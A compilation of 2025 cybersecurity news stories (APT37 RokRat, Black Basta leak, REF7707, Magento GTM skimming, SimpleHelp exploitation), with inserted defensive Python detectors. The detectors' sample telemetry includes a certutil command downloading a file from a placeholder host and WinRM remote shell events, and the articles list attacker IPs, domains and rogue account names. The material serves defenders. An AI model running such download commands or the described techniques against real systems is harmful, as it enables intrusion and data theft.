
Cybercrime in 2025: AI-Powered Attacks, Identity Exploits, and the Rise of Nation-State Threats

Cybercrime has evolved beyond traditional hacking, transforming into a highly organized and sophisticated industry. In 2025, cyber adversaries — ranging from financially motivated criminals to nation-state actors — are leveraging AI, identity-based attacks, and cloud exploitation to breach even the most secure organizations. The 2025 CrowdStrike Global Threat Report highlights how cybercriminals now operate like businesses. 

One of the fastest-growing trends is Access-as-a-Service, where initial access brokers infiltrate networks and sell entry points to ransomware groups and other malicious actors. The shift from traditional malware to identity-based attacks is accelerating, with 79% of observed breaches relying on valid credentials and remote administration tools instead of malicious software. Attackers are also moving faster than ever. Breakout times—the speed at which cybercriminals move laterally within a network after breaching it—have hit a record low of just 48 minutes, with the fastest observed attack spreading in just 51 seconds. 

This efficiency is fueled by AI-driven automation, making intrusions more effective and harder to detect. AI has also revolutionized social engineering. AI-generated phishing emails now have a 54% click-through rate, compared to just 12% for human-written ones. Deepfake technology is being used to execute business email compromise scams, such as a $25.6 million fraud involving an AI-generated video. In a more alarming development, North Korean hackers have used AI to create fake LinkedIn profiles and manipulate job interviews, gaining insider access to corporate networks. 

The rise of AI in cybercrime is mirrored by the increasing sophistication of nation-state cyber operations. China, in particular, has expanded its offensive capabilities, with a 150% increase in cyber activity targeting finance, manufacturing, and media sectors. Groups like Vanguard Panda are embedding themselves within critical infrastructure networks, potentially preparing for geopolitical conflicts. 

As traditional perimeter security becomes obsolete, organizations must shift to identity-focused protection strategies. Cybercriminals are exploiting cloud vulnerabilities, leading to a 35% rise in cloud intrusions, while access broker activity has surged by 50%, demonstrating the growing value of stolen credentials. 

To combat these evolving threats, enterprises must adopt new security measures. Continuous identity monitoring, AI-driven threat detection, and cross-domain visibility are now critical. As cyber adversaries continue to innovate, businesses must stay ahead—or risk becoming the next target in this rapidly evolving digital battlefield.

North Korean Hackers Exploit ZIP Files in Sophisticated Cyber Attacks

State-sponsored hacking group APT37 (ScarCruft) is deploying advanced cyber-espionage tactics to infiltrate systems using malicious ZIP files containing LNK shortcuts. These files are typically disguised as documents related to North Korean affairs or trade agreements and are spread through phishing emails.

Once opened, the attack unfolds in multiple stages, leveraging PowerShell scripts and batch files to install the RokRat remote access Trojan (RAT) as the final payload.

The infection starts with carefully crafted phishing emails, often using real information from legitimate websites to enhance credibility. These emails contain malicious ZIP attachments housing LNK files. When executed, the LNK file verifies its directory path, relocating itself to %temp% if necessary.

It then extracts multiple components, including:

  • A decoy HWPX document
  • A batch script (shark.bat)
  • Additional payloads like caption.dat and elephant.dat

The shark.bat script executes PowerShell commands discreetly, launching the elephant.dat script, which decrypts caption.dat using an XOR key. The decrypted content is then executed in memory, ultimately deploying RokRat RAT.
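An added example (not from the original post or any vendor tooling) of a defensive attachment check for the ZIP-wrapped LNK lure described above: it identifies shell links by their header bytes rather than by file extension, notes names that hide the link behind a document-looking double extension, recurses into nested ZIPs, and never extracts anything to disk. The sample archive and its file names are constructed for the demonstration.

```python
import io
import zipfile

# Every Windows shell link starts with HeaderSize 0x0000004C followed by the
# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_MAGIC = (b"\x4c\x00\x00\x00"                      # HeaderSize
             b"\x01\x14\x02\x00\x00\x00\x00\x00"      # CLSID Data1..Data3 (little-endian)
             b"\xc0\x00\x00\x00\x00\x00\x00\x46")     # CLSID Data4


def scan_zip_bytes(data: bytes, depth: int = 0, max_depth: int = 2) -> list[str]:
    """Return findings for a ZIP attachment held in memory.

    Flags entries that are shell links by header (not by name), notes when the
    name hides that fact behind a non-.lnk extension or a document-looking
    double extension, and recurses into nested ZIP entries up to max_depth.
    """
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    findings = []
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower()
            with zf.open(info) as fh:            # read only the header; nothing touches disk
                head = fh.read(len(LNK_MAGIC))
            if head == LNK_MAGIC:
                reason = "shell link (LNK) by header"
                if not lower.endswith(".lnk"):
                    reason += ", extension hides it"
                elif lower.count(".") > 1:
                    reason += ", document-looking double extension"
                findings.append(f"{name}: {reason}")
            elif lower.endswith(".zip") and depth < max_depth:
                for f in scan_zip_bytes(zf.read(info), depth + 1, max_depth):
                    findings.append(f"{name} -> {f}")
    return findings


def build_sample_zip() -> bytes:
    """Constructed lure modelled on the article: a decoy document plus shortcuts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("North_Korea_Trade_Memo.hwpx", b"decoy document bytes")
        zf.writestr("North_Korea_Trade_Memo.hwpx.lnk", LNK_MAGIC + b"\x00" * 60)
        zf.writestr("readme.dat", LNK_MAGIC + b"\x00" * 60)      # link hiding behind .dat
        inner = io.BytesIO()
        with zipfile.ZipFile(inner, "w") as nested:
            nested.writestr("attachment.lnk", LNK_MAGIC + b"\x00" * 60)
        zf.writestr("more.zip", inner.getvalue())               # nested archive
    return buf.getvalue()


if __name__ == "__main__":
    for line in scan_zip_bytes(build_sample_zip()):
        print(line)
```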

Once active, RokRat collects detailed system information, such as:
  • Operating system version
  • Computer name
  • Logged-in user details
  • Running processes
  • Screenshots of the infected system
The stolen data is then exfiltrated to command-and-control (C2) servers via legitimate cloud services like pCloud, Yandex, and Dropbox, utilizing their APIs to send, download, and delete files while embedding OAuth tokens for stealthy communication.

RokRat also allows attackers to execute remote commands, conduct system reconnaissance, and terminate processes. To avoid detection, it implements anti-analysis techniques, including:
  • Detecting virtual environments via VMware Tools
  • Sandbox detection by creating and deleting temporary files
  • Debugger detection using IsDebuggerPresent
The malware ensures secure communication by encrypting data using XOR and RSA encryption, while C2 commands are received in AES-CBC encrypted form, decrypted locally, and executed on the compromised system. These commands facilitate data collection, file deletion, and malware termination.

By leveraging legitimate cloud services, RokRat seamlessly blends into normal network traffic, making detection more challenging.

“This sophisticated approach highlights the evolving tactics of APT37, as they continue to adapt and expand their operations beyond traditional targets, now focusing on both Windows and Android platforms through phishing campaigns.”

As APT37 refines its cyberattack strategies, organizations must remain vigilant against such persistent threats and enhance their cybersecurity defenses.

University of Notre Dame Hit by Cyberattack — Hackers Say They Stole Everything

A cybercriminal group known as Fog Ransomware has claimed responsibility for a cyberattack on the University of Notre Dame in Perth, Australia. According to reports, the group has allegedly stolen 62.2GB of sensitive data, including student medical records, staff and student contact information, and confidential documents.  


Hackers Announce Data Theft on the Dark Web  

The university was first alerted to a cybersecurity breach in January 2025. Recently, technology news sources revealed that Fog Ransomware had posted details of the attack on its dark web leak site. The group claimed to have accessed and stolen a large amount of private and institutional information.  

As of now, the hackers have not made any ransom demands or issued a deadline for payment. Cybersecurity experts believe that this group has a history of targeting educational and recreational institutions worldwide.  


How the Attack Has Affected the University  

The cyberattack has disrupted essential university operations, making it difficult for students and staff to access key services. Some of the areas impacted include:  

1. Payroll and leave management – Employees have been unable to process payments and leave applications as usual. Temporary manual processes have been put in place.  

2. Student enrolments and timetables – Many students have struggled to access their class schedules and register for courses.  

3. Communication services – Internet and email systems have also been affected, causing delays in official university communication.  

University official Patrick Hampton, who is both the Deputy Head of Education and President of the National Tertiary Education Union WA Notre Dame branch, stated that the attack had disrupted critical functions necessary for the university’s daily operations. He also emphasized that staff and students need additional support to cope with these challenges.  


Uncertainty Over the Full Extent of the Data Breach  

At this stage, the university has not been able to confirm exactly what data has been stolen. A spokesperson explained that while primary systems handling student records, finance, and human resources appear secure, some separately stored data might have been compromised.  

To assess the situation, the university has engaged international cybersecurity experts and is working to determine the extent of the breach. Officials have assured that if any personal data is found to be affected, the university will notify those impacted as soon as possible.  


Response and Future Actions

The incident has been reported to the Australian Cyber Security Centre (ACSC), and the university is taking necessary precautions to strengthen its security measures. Despite the ongoing challenges, the university has confirmed that classes for the 2025 academic year will begin as scheduled.  

Meanwhile, the staff union is pushing for greater transparency from the university administration. They are demanding that university leadership keep staff and students fully informed about what data has been compromised and provide assurances about data protection measures moving forward.  

This attack is a reminder of the increasing cybersecurity threats faced by educational institutions. Universities hold vast amounts of sensitive student and staff data, making them prime targets for cybercriminals. 

Internal Chat Logs of Black Basta Ransomware Gang Leaked Online

A previously unidentified source has leaked what is claimed to be an archive of internal Matrix chat logs linked to the Black Basta ransomware group. The individual behind the leak, known as ExploitWhispers, initially uploaded the stolen messages to the MEGA file-sharing platform, which has since taken them down. However, they have now made the archive available through a dedicated Telegram channel.

It remains uncertain whether ExploitWhispers is a cybersecurity researcher who infiltrated the group's internal chat server or a discontented member of the operation. While no specific reason was provided for the leak, cybersecurity intelligence firm PRODAFT suggested that it could be a direct consequence of the ransomware gang’s alleged attacks on Russian banks.

"As part of our continuous monitoring, we've observed that BLACKBASTA (Vengeful Mantis) has been mostly inactive since the start of the year due to internal conflicts. Some of its operators scammed victims by collecting ransom payments without providing functional decryptors," PRODAFT stated.

"On February 11, 2025, a major leak exposed BLACKBASTA's internal Matrix chat logs. The leaker claimed they released the data because the group was targeting Russian banks. This leak closely resembles the previous Conti leaks."

The leaked archive contains internal chat messages exchanged between September 18, 2023, and September 28, 2024. A review conducted by BleepingComputer reveals that the messages encompass a broad range of sensitive information, including phishing templates, email addresses for targeting, cryptocurrency wallets, data dumps, victims' login credentials, and confirmations of previously reported attack strategies.

Additionally, the leaked records contain 367 unique ZoomInfo links, potentially reflecting the number of organizations targeted during the specified timeframe. Ransomware groups frequently use ZoomInfo to gather intelligence on their targets, either internally or for negotiations with victims.

ExploitWhispers also disclosed information about key Black Basta members, identifying Lapa as an administrator, Cortes as a threat actor connected to the Qakbot malware group, and YY as the primary administrator. Another individual, referred to as Trump (also known as GG and AA), is believed to be Oleg Nefedov, who is suspected of leading the operation.

Black Basta operates as a Ransomware-as-a-Service (RaaS) group, first emerging in April 2022. The gang has targeted several high-profile organizations across various industries, including healthcare, government contractors, and major corporations.

Notable victims include German defense contractor Rheinmetall, Hyundai's European division, BT Group (formerly British Telecom), U.S. healthcare provider Ascension, government contractor ABB, the American Dental Association, U.K. tech outsourcing firm Capita, the Toronto Public Library, and Yellow Pages Canada.

A joint report from CISA and the FBI, published in May 2024, revealed that Black Basta affiliates compromised more than 500 organizations between April 2022 and May 2024.

Research from Corvus Insurance and Elliptic estimates that the ransomware gang collected approximately $100 million in ransom payments from over 90 victims by November 2023.

This incident bears similarities to the February 2022 data breach involving the Russian-based Conti cybercrime syndicate. At that time, a Ukrainian security researcher leaked over 170,000 internal chat messages and the source code for the Conti ransomware encryptor, following the group's public support for Russia amid the Ukraine conflict.

Hackers Target South America and Southeast Asia

A group of hackers has been caught running a large-scale cyber spying operation, now called REF7707. The attack was first noticed in November 2024 when strange activity was detected in the Foreign Ministry of a South American country. As experts looked deeper, they found that the same hackers had also targeted several other organizations in Southeast Asia.  

The attackers used advanced hacking tools to break into computer systems, steal information, and stay hidden for a long time. However, even though they were highly skilled, they made serious mistakes that exposed their operation.  


The Malicious Software Used in the Attack  

The hackers used three main types of malware (harmful programs) to infect computers and control them remotely:  

FINALDRAFT: A Hidden Control System 

One of the key tools in this attack was FINALDRAFT, a type of software that allowed hackers to secretly take control of a computer. Once installed, they could:  

  • Run commands: Hackers could make the infected computer perform actions, like downloading more malware or collecting sensitive files.  
  • Hide in normal programs: They inserted their malicious code into everyday programs like MS Paint, making it harder for security software to detect.  
  • Use Microsoft’s online services: The hackers used Microsoft Graph API, a service that businesses commonly use, to blend their malicious activities with normal traffic.  


GUIDLOADER and PATHLOADER: Sneaky Installers

These two programs acted as delivery tools that installed FINALDRAFT on infected computers. Instead of storing dangerous files on a computer’s hard drive (where they could be detected), they loaded the malware directly into the computer’s memory. This method helps cybercriminals avoid antivirus scans.  

To further cover their tracks, they hid malware downloads on popular websites, including:  

1. Google Firebase (a cloud service used by developers)  

2. Pastebin (a site often used to store and share text)  

3. Web storage systems of Southeast Asian universities  

By using trusted websites, they made it harder for security systems to recognize the attack.  


Hackers Misused Windows Tools to Spread  

Instead of only relying on their own hacking tools, the attackers took advantage of built-in Windows programs to spread across networks:  

  • Certutil.exe: A program designed to manage security certificates, but in this case, hackers misused it to download and install their malware.  
  • Windows Remote Management (WinRM): A legitimate Windows tool that lets administrators control computers remotely. The hackers used this to jump from one system to another, meaning they likely stole passwords from previous attacks.  

By using tools that were already part of Windows, they avoided setting off alarms that custom-made malware might trigger.  
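As an added example (not from the original article or the REF7707 research), here is detection logic a defender could run over process-creation telemetry to catch the two living-off-the-land patterns described above: certutil.exe fetching a remote file, and a shell started under wsmprovhost.exe, the process that hosts commands received over WinRM. The events are constructed Sysmon-style JSON lines; the field names, hostnames and URL are assumptions.

```python
import json

# certutil switches that make it fetch content from a URL (the misuse described above).
CERTUTIL_FETCH_SWITCHES = ("-urlcache", "/urlcache", "-verifyctl", "/verifyctl")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def analyze_event(ev: dict) -> list[str]:
    """Return alert strings for one process-creation event (Sysmon-style field names)."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    parent = ev.get("ParentImage", "").lower()
    alerts = []
    if (image.endswith("\\certutil.exe") and "http" in cmd
            and any(sw in cmd for sw in CERTUTIL_FETCH_SWITCHES)):
        alerts.append("certutil.exe used to fetch a remote file")
    # wsmprovhost.exe runs commands received over WinRM; a shell under it means
    # someone executed commands on this host remotely, the lateral-movement step.
    if parent.endswith("\\wsmprovhost.exe") and any(image.endswith("\\" + s) for s in SHELLS):
        alerts.append("shell spawned under WinRM host (remote command execution)")
    return alerts


def analyze_log(lines) -> list[tuple[int, str, str]]:
    """Run analyze_event over JSON lines; returns (line number, host, alert) tuples."""
    hits = []
    for n, line in enumerate(lines, 1):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON noise rather than abort the whole scan
        for alert in analyze_event(ev):
            hits.append((n, ev.get("Computer", "?"), alert))
    return hits


# Constructed sample telemetry (not real data); backslashes are doubled for JSON.
SAMPLE_EVENTS = r"""
{"Computer": "WS01", "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -verify C:\\temp\\cert.cer"}
{"Computer": "WS01", "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -urlcache -split -f http://staging.invalid/update.dat C:\\Users\\Public\\update.dat"}
{"Computer": "SRV02", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe", "CommandLine": "cmd.exe /c whoami"}
{"Computer": "SRV02", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe"}
not json
"""

if __name__ == "__main__":
    for n, host, alert in analyze_log(SAMPLE_EVENTS.strip().splitlines()):
        print(f"line {n} [{host}]: {alert}")
```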


How the Hackers Were Caught  

Even though REF7707 was a well-planned attack, the hackers made several big mistakes that helped cybersecurity experts uncover their activities.  

Key Errors They Made:

1. Left behind test versions of their malware: Some samples contained error messages and incomplete code, revealing how they built their attack.  

2. Exposed their own websites: Many of their fake websites remained open and accessible, allowing experts to track their movements.  

3. Messed up their encryption: Some malware was poorly coded, which made it easier for researchers to analyze and understand how it worked.  


Tracing the Hackers’ Footsteps  

By following these mistakes, security researchers tracked the hackers’ network of fake websites and compromised services. Some of the suspicious domains they discovered included:  

1. digert.ictnsc[.]com

2. support.vmphere[.]com  

3. hobiter[.]com and vm-clouds[.]net, which shared the same setup, suggesting they were controlled by the same group.  

The attackers also abused Microsoft’s services to make their hacking traffic look like normal company activity.  


What We Can Learn from This Attack

REF7707 is a clear example of how cybercriminals use sophisticated tricks to break into important systems, stay hidden, and steal data. But it also proves that even expert hackers can make mistakes — and when they do, security teams can use those errors to track them down.  

Hackers are constantly improving their tactics, but as this case shows, cybersecurity experts are also getting better at catching them.  


Cybercriminals Exploit Google Tag Manager to Steal Payment Data from Magento Sites

Cybercriminals have been leveraging Google Tag Manager (GTM) to inject malware into Magento-powered eCommerce websites, compromising customer payment data, according to cybersecurity experts.

Security researchers at Sucuri recently detected a live attack where a Magento-based online store suffered a credit card data breach. The investigation led to a malicious script embedded within Google Tag Manager, which, while appearing to be a standard tracking tool, was designed to steal sensitive payment information.

Google Tag Manager is a widely used tag management system that enables website owners to deploy tracking codes without modifying site code directly. However, attackers obfuscate the injected script, making detection difficult. The malware captures payment details at checkout and transmits them to a remote server. Researchers also discovered a backdoor, allowing persistent access to compromised sites.

At least six websites were found infected with the same GTM ID, and one domain used in the attack, eurowebmonitortool[dot]com, has now been blacklisted by major security firms. Cybersecurity experts emphasize that this attack method is not new. Sucuri researchers had previously identified similar threats, reaffirming that this technique is "still being widely used."

Given its popularity among eCommerce businesses, Magento remains a primary target for cybercriminals. Stolen payment data can be exploited for fraudulent purchases, malvertising campaigns, and other illicit activities.

Security Measures for Protection
To mitigate risks, website administrators should:
  • Remove any suspicious GTM tags
  • Conduct a full security scan
  • Ensure Magento and all extensions are updated
  • Regularly monitor site traffic and GTM configurations for anomalies
Proactive cybersecurity measures and ongoing vulnerability monitoring are crucial to safeguarding eCommerce platforms from such sophisticated attacks.
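An added example (not Sucuri's tooling or code from the article) of the monitoring step above: it audits a checkout page's HTML for GTM container IDs outside an allowlist, third-party script hosts that are not expected, and inline scripts carrying common obfuscation markers. The sample page, the allowlists and the obfuscation heuristics are assumptions constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

GTM_ID_RE = re.compile(r"\bGTM-[A-Z0-9]{4,}\b")
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*\bsrc=["']([^"']+)["']""", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script\b(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)
# Assumed heuristics: decoding/eval helpers typical of obfuscated skimmer code,
# plus long base64 runs that hide the real payload.
OBFUSCATION_HINTS = ("atob(", "string.fromcharcode", "unescape(", "eval(")
LONG_B64_RE = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")


def audit_page(html: str, allowed_gtm_ids: set, allowed_script_hosts: set) -> list[str]:
    """Return findings for one page: unknown GTM containers, unexpected script
    hosts, and inline scripts that look obfuscated."""
    findings = []
    for gid in sorted(set(GTM_ID_RE.findall(html))):
        if gid not in allowed_gtm_ids:
            findings.append(f"unknown GTM container {gid}")
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname  # None for same-origin paths such as /js/app.js
        if host and host.lower() not in allowed_script_hosts:
            findings.append(f"script loaded from unexpected host {host}")
    for body in INLINE_SCRIPT_RE.findall(html):
        lowered = body.lower()
        if any(h in lowered for h in OBFUSCATION_HINTS) or LONG_B64_RE.search(body):
            findings.append("inline script with obfuscation markers: " + body.strip()[:40] + "...")
    return findings


# Constructed allowlists for the store being audited.
ALLOWED_GTM_IDS = {"GTM-ABCD12"}
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com"}

# Constructed checkout page: one legitimate container, one injected container,
# one unexpected third-party script and one obfuscated inline script.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ABCD12"></script>
<script src="/static/js/checkout.js"></script>
<script src="https://stats.example-monitor.invalid/collect.js"></script>
<script>
  (function(){ var p = atob("ZG9jdW1lbnQuZm9ybXM="); /* constructed: hides a string */ })();
</script>
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-ZZ9999"></iframe></noscript>
</head><body>checkout form here</body></html>
"""

if __name__ == "__main__":
    for f in audit_page(SAMPLE_CHECKOUT_HTML, ALLOWED_GTM_IDS, ALLOWED_SCRIPT_HOSTS):
        print(f)
```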

Cybercriminals Intensify Attacks on Password Managers

Cybercriminals are increasingly setting their sights on password managers as a way to infiltrate critical digital accounts.

According to Picus Security’s Red Report 2025, which analyzed over a million malware samples from the past year, a quarter (25%) of all malware now targets credentials stored in password managers. Researchers noted that this marks a threefold surge compared to the previous year.

“For the first time ever, stealing credentials from password stores is in the top 10 techniques listed in the MITRE ATT&CK Framework,” they said. “The report reveals that these top 10 techniques accounted for 93% of all malicious actions in 2024.”

Advanced Hacking Techniques

Dr. Suleyman Ozarslan, co-founder and VP of Picus Labs, revealed that cybercriminals use sophisticated methods like memory scraping, registry harvesting, and breaching both local and cloud-based password stores to extract credentials.

To counter this rising threat, Ozarslan emphasized the importance of using password managers alongside multi-factor authentication (MFA). He also warned against password reuse, particularly for password.

Beyond the growing frequency of attacks, hackers are also deploying more advanced techniques. Picus Security highlighted that modern cybercriminals are now favoring long-term, multi-stage attacks that leverage a new generation of malware. These advanced infostealers are designed for stealth, persistence, and automation.

Researchers compared this evolution in cyber threats to “the perfect heist,” noting that most malware samples execute over a dozen malicious actions to bypass security defenses, escalate privileges, and exfiltrate data.

A password manager is a cybersecurity tool that securely stores, generates, and auto-fills strong passwords across websites and apps. By eliminating the need to remember multiple passwords, it strengthens security and reduces the risk of breaches. Experts consider it an essential component of cybersecurity best practices.

Hackers Exploit SimpleHelp RMM Vulnerabilities to Deploy Backdoors and Create Admin Accounts

Hackers are exploiting vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) clients to gain administrative control, install backdoors, and possibly set the stage for ransomware deployment.

The vulnerabilities, identified as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, were initially flagged by Arctic Wolf as potential attack vectors last week. While the firm could not verify active exploitation, cybersecurity company Field Effect has now confirmed their abuse in ongoing cyberattacks.

Field Effect shared its findings with BleepingComputer, highlighting that the attack patterns bear similarities to Akira ransomware activity. However, researchers lack definitive evidence to attribute these attacks with high confidence.

The breach begins when attackers exploit SimpleHelp RMM vulnerabilities to gain unauthorized access to a target system. The initial connection originates from IP address 194.76.227[.]171, linked to an Estonian server running a SimpleHelp instance on port 80.

Once inside, the attackers execute reconnaissance commands to gather information on system architecture, user privileges, network configurations, scheduled tasks, services, and Domain Controller (DC) details. Researchers also observed a specific command attempting to identify the CrowdStrike Falcon security suite, likely as part of an evasion strategy.

Leveraging this access, the hackers create a new administrator account ("sqladmin") to maintain persistence. They then deploy Sliver, a post-exploitation framework (agent.exe) increasingly used as an alternative to Cobalt Strike, which security tools now frequently detect.

Once executed, Sliver connects to a command-and-control (C2) server in the Netherlands, allowing remote command execution. Field Effect also discovered a backup IP with Remote Desktop Protocol (RDP) enabled, indicating additional persistence measures.

After securing initial access, the attackers escalate their attack by compromising the Domain Controller (DC) via the same SimpleHelp RMM client. They create another admin account ("fpmhlttech") and, instead of deploying a conventional backdoor, install a Cloudflare Tunnel disguised as Windows svchost.exe to bypass security defenses and maintain stealthy access.

To safeguard against these threats, SimpleHelp users must immediately apply security updates addressing CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728. Users should also:

  • Audit admin accounts: Look for unauthorized accounts like "sqladmin" and "fpmhlttech".
  • Monitor network connections: Check for any connections to suspicious IPs flagged in Field Effect’s report.
  • Restrict RMM access: Limit SimpleHelp usage to trusted IP ranges to prevent unauthorized logins.
By following these security measures, organizations can mitigate risks associated with SimpleHelp RMM vulnerabilities and prevent potential ransomware attacks.
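An added example, not part of the article or Field Effect's report, turning the three recommendations above into checks over normalized endpoint and SimpleHelp events: the account names and source IP come from the article, while the event schema, the trusted admin range 10.20.0.0/16, and the sample events are constructed assumptions. It also covers the svchost.exe masquerade mentioned earlier, since a renamed tunnel binary cannot live in the system directories.

```python
import ipaddress
import json

# Indicators taken from the Field Effect findings quoted in the article.
SUSPECT_ACCOUNTS = {"sqladmin", "fpmhlttech"}
FLAGGED_IPS = {ipaddress.ip_address("194.76.227.171")}
# Assumption for this example: the only networks admins should reach SimpleHelp from.
TRUSTED_RMM_NETS = [ipaddress.ip_network("10.20.0.0/16")]
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def ip_in_nets(ip: str, nets) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in n for n in nets)


def check_event(ev: dict) -> list[str]:
    """Apply the audit checks to one normalized event; returns alert strings."""
    alerts = []
    kind = ev.get("EventType")
    if kind == "AccountCreated":
        name = ev.get("TargetUserName", "").lower()
        if name in SUSPECT_ACCOUNTS:
            alerts.append(f"account name from reported intrusion created: {name}")
    elif kind == "ProcessCreate":
        image = ev.get("Image", "").lower()
        # The real svchost.exe lives in System32/SysWOW64; a copy elsewhere is a masquerade.
        if image.endswith("\\svchost.exe") and not image.startswith(SYSTEM_DIRS):
            alerts.append(f"svchost.exe outside system directories: {ev['Image']}")
    elif kind == "NetworkConnect":
        for field in ("SourceIp", "DestinationIp"):
            if field in ev and ipaddress.ip_address(ev[field]) in FLAGGED_IPS:
                alerts.append(f"{field} matches flagged address {ev[field]}")
    elif kind == "RmmLogin":
        if not ip_in_nets(ev["SourceIp"], TRUSTED_RMM_NETS):
            alerts.append(f"SimpleHelp login from untrusted range: {ev['SourceIp']}")
    return alerts


def audit(lines) -> list[tuple[int, str]]:
    """Run check_event over JSON lines; returns (line number, alert) pairs."""
    hits = []
    for n, line in enumerate(lines, 1):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        hits.extend((n, a) for a in check_event(ev))
    return hits


# Constructed sample events (not real telemetry); backslashes doubled for JSON.
SAMPLE_EVENTS = r"""
{"EventType": "AccountCreated", "TargetUserName": "sqladmin", "SubjectUserName": "svc_rmm"}
{"EventType": "AccountCreated", "TargetUserName": "jsmith", "SubjectUserName": "helpdesk"}
{"EventType": "ProcessCreate", "Image": "C:\\ProgramData\\svchost.exe", "CommandLine": "svchost.exe tunnel run"}
{"EventType": "ProcessCreate", "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"}
{"EventType": "NetworkConnect", "SourceIp": "194.76.227.171", "DestinationIp": "10.20.4.7", "DestinationPort": 80}
{"EventType": "RmmLogin", "SourceIp": "203.0.113.5", "User": "admin"}
{"EventType": "RmmLogin", "SourceIp": "10.20.4.7", "User": "admin"}
"""

if __name__ == "__main__":
    for n, alert in audit(SAMPLE_EVENTS.strip().splitlines()):
        print(f"line {n}: {alert}")
```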